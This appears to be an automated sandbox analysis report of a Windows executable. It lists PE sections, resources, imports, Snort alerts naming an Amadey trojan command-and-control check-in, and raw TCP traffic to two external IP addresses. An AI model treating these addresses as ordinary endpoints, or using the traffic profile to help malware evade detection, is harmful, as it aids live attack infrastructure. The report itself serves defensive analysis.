                                                                                                                                                                                .duha0x27590000x170x200False0.02734375data0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rsrc0x275a0000x80800x8200False0.648347355769data6.08972992358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                                RT_CURSOR0x2760ce00x130data
                                                                                                                                                                                RT_ICON0x275a4500xea8dataOriyaIndia
                                                                                                                                                                                RT_ICON0x275b2f80x8a8dataOriyaIndia
                                                                                                                                                                                RT_ICON0x275bba00x6c8dataOriyaIndia
                                                                                                                                                                                RT_ICON0x275c2680x568GLS_BINARY_LSB_FIRSTOriyaIndia
                                                                                                                                                                                RT_ICON0x275c7d00x25a8dataOriyaIndia
                                                                                                                                                                                RT_ICON0x275ed780x10a8dataOriyaIndia
                                                                                                                                                                                RT_ICON0x275fe200x988dataOriyaIndia
                                                                                                                                                                                RT_ICON0x27607a80x468GLS_BINARY_LSB_FIRSTOriyaIndia
                                                                                                                                                                                RT_STRING0x2760fd80x360dataSpanishEcuador
                                                                                                                                                                                RT_STRING0x27613380x326dataSpanishEcuador
                                                                                                                                                                                RT_STRING0x27616600x47edataSpanishEcuador
                                                                                                                                                                                RT_STRING0x2761ae00x304dataSpanishEcuador
                                                                                                                                                                                RT_STRING0x2761de80x292dataSpanishEcuador
                                                                                                                                                                                RT_ACCELERATOR0x2760c880x40dataSpanishEcuador
                                                                                                                                                                                RT_ACCELERATOR0x2760cc80x18dataSpanishEcuador
                                                                                                                                                                                RT_GROUP_CURSOR0x2760e100x14data
                                                                                                                                                                                RT_GROUP_ICON0x2760c100x76dataOriyaIndia
                                                                                                                                                                                RT_VERSION0x2760e280x1b0data

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                KERNEL32.dllCommConfigDialogA, WaitForSingleObject, WriteConsoleInputA, CreateHardLinkA, GetConsoleAliasesA, GetSystemTimeAsFileTime, GetConsoleTitleA, GetConsoleAliasesLengthW, GetHandleInformation, GetThreadLocale, GetProcAddress, GetLongPathNameA, VirtualAlloc, HeapSize, FreeUserPhysicalPages, LoadLibraryA, LocalAlloc, EndUpdateResourceA, RaiseException, SetFilePointer, PulseEvent, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapAlloc, IsProcessorFeaturePresent, GetLastError, HeapFree, CloseHandle, LoadLibraryW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, Sleep, GetConsoleCP, GetConsoleMode, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, SetStdHandle, FlushFileBuffers, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, LCMapStringW, GetStringTypeW, CreateFileW
                                                                                                                                                                                USER32.dllSetCaretPos
                                                                                                                                                                                GDI32.dllGetCharWidthFloatA
                                                                                                                                                                                ADVAPI32.dllBackupEventLogA
                                                                                                                                                                                MSIMG32.dllGradientFill

                                                                                                                                                                                Version Infos

                                                                                                                                                                                DescriptionData
                                                                                                                                                                                InternalNamebomgpiaruci.iwa
                                                                                                                                                                                ProductVersion13.54.77.27
                                                                                                                                                                                CopyrightCopyrighz (C) 2021, fudkat
                                                                                                                                                                                Translation0x0124 0x046a

                                                                                                                                                                                Possible Origin

                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                OriyaIndia
                                                                                                                                                                                SpanishEcuador

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                12/01/21-10:05:54.211834TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.408455TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.408466TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.408678TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.408693TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.409106TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.409332TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.409886TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.410076TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.414169TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.421448TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.421740TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.423074TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.431290TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.432063TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.432215TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.435747TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.442713TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.443507TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.443606TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.443647TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.444228TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.445740TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.447144TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.448336TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.448669TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.449773TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.453252TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.456165TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.458602TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.504899TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.510776TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.513533TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.515915TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.516541TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.518482TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.520615TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.522776TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.526770TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.526859TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.527178TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.529109TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.529344TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.533447TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.535078TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.570574TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.572828TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.573509TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.574776TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.576078TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.577981TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.578675TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.582401TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.582759TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.583077TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.583391TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.585467TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.585611TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.586423TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.591147TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.593413TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.597387TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.606779TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.608267TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.680209TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.684136TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.685190TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.685281TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.687574TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.690606TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.692115TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.692845TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.703493TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.704927TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.705428TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.718487TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.719101TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.721432TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.723236TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.757911TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.759030TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.759416TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.760240TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.761572TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.762873TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.764921TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.766376TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.767798TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.767873TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.772697TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.773630TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.775379TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.778500TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.782477TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.782516TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783241TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783277TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783473TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783747TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.785933TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.788582TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.789010TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.789363TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.840143TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.841790TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.842416TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.845220TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.845828TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.846573TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.850280TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.851253TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.855419TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.864273TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.869473TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.869711TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.871214TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.872869TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.877576TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.891899TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.895215TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.901809TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.904751TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.905665TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.905864TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.906124TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.909444TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.909685TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.920324TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.084198TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.085586TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.087788TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.091230TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.092609TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.095401TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.095922TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.096160TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Dec 1, 2021 10:04:25.983047009 CET4974980192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.040610075 CET804974995.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.040844917 CET4974980192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.041062117 CET4974980192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.041090965 CET4974980192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.098548889 CET804974995.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.148890972 CET804974995.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.149040937 CET4974980192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.151086092 CET4974980192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.184169054 CET4975080192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.208477974 CET804974995.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.242199898 CET804975095.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.242590904 CET4975080192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.243459940 CET4975080192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.243482113 CET4975080192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.301357985 CET804975095.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.347946882 CET804975095.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.348107100 CET4975080192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.348238945 CET4975080192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.406089067 CET804975095.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.692205906 CET4975180192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.750289917 CET804975195.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.750407934 CET4975180192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.750736952 CET4975180192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.750766993 CET4975180192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.808737993 CET804975195.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.852677107 CET804975195.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.852770090 CET4975180192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.854207039 CET4975180192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.884598970 CET4975280192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.912249088 CET804975195.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.941859007 CET804975295.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.941988945 CET4975280192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.942143917 CET4975280192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.942167997 CET4975280192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:26.999768019 CET804975295.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.042258024 CET804975295.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.042337894 CET4975280192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.042385101 CET4975280192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.099776030 CET804975295.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.378343105 CET4975380192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.436094999 CET804975395.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.436258078 CET4975380192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.436376095 CET4975380192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.436402082 CET4975380192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.493985891 CET804975395.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.537578106 CET804975395.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.537655115 CET4975380192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.537714958 CET4975380192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.595101118 CET804975395.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.878122091 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.935216904 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.936881065 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.936999083 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.937012911 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.994172096 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.043939114 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.044023991 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.044369936 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.101336956 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.360445023 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.418559074 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.421931028 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.422101021 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.505357027 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505397081 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505409002 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505425930 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505444050 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505461931 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505476952 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505492926 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505510092 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505526066 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505578995 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.505640030 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.563786030 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563821077 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563834906 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563852072 CET804975595.213.165.249192.168.2.3
